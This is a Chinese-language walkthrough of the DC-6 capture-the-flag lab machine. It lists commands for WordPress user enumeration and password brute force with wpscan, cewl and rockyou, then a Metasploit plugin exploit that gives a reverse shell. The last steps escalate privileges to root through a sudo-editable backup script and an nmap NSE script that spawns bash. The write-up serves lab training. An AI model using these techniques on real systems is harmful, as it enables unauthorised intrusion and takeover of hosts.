靶机渗透DC-6

DC-5关卡存了稿，但是不知道为什么再打开靶机继续写的时候日志文件怎么都读取不到，尝试了重装，还是不行，暂时还不知道到底毛病出在哪里······只好先放下这关，先做第六关吧。

扫描出来直接访问网站。‘

001

是个WorldPress。这里有个坑，前几关把IP放在hosts里面，注释写什么都可以，但是这关必须加上wordy，否则访问会出问题。

 wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate u

Wpscan扫描一波。

002

扫出来五个用户。

看看默认后台，确实存在。

003

cewl -w dc6pwd,txt http://wordy/

利用cewl生成个字典

004

跟用户名枚举。

wpscan --url http://wordy/ -U dc6users.txt -P dc6pwd.txt

005

啥情况，一个都没爆到。

又研究半天，感觉方向应该没错。

上官网查了查DC-6，发现作者有一段提示。

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ?

006

原来路径里面内置了一个压缩包。

解压下来。

007

根据提示。

cat rockyou.txt | grep k01 > k01.txt

然后再爆破密码，结果成功爆到一个密码。

008

然后去后台登陆。

009

在users里面看到可以增加新用户。

010

起初的想法是增加一个用户，但是好像没什么用。

再继续找。

011

这里比较可疑，显示了IP HooK等信息。神器msf搜一下这个插件看看。

012

有三个可利用的模块。用第三个html。

013

给了详细的信息。通过替换ip、端口可以反弹shell。

014

在Tools选项，IP随便填，然后Loolup抓包，修改填入的IP处。

015

已经连接到Shell。

python -c "import pty;pty.spawn('/bin/bash')"

获得交互式Shell。

016

然后就是翻目录了。

在home/mark/stuff目录下发现一个txt文件，查看。

017

看到了一个新的用户名密码。SSH登陆。

018

成功登陆。

sudo -l看看。

019

020

然后vi模式把解压命令删除，（vi命令使用方法去百度，vim和vi不是一个调用）留下/bin/bash。以jens用户执行。

sudo -u jens /home/jens/backups.sh PS

021

直接登陆了jens用户，再sudo -l

022

看到jens用户可以在无需输入密码的情况下使用nmap。

echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script=/home/jens/root.nse

先写个nse脚本，再执行。

023

成功提权为root。最后在root目录下找到flag。

024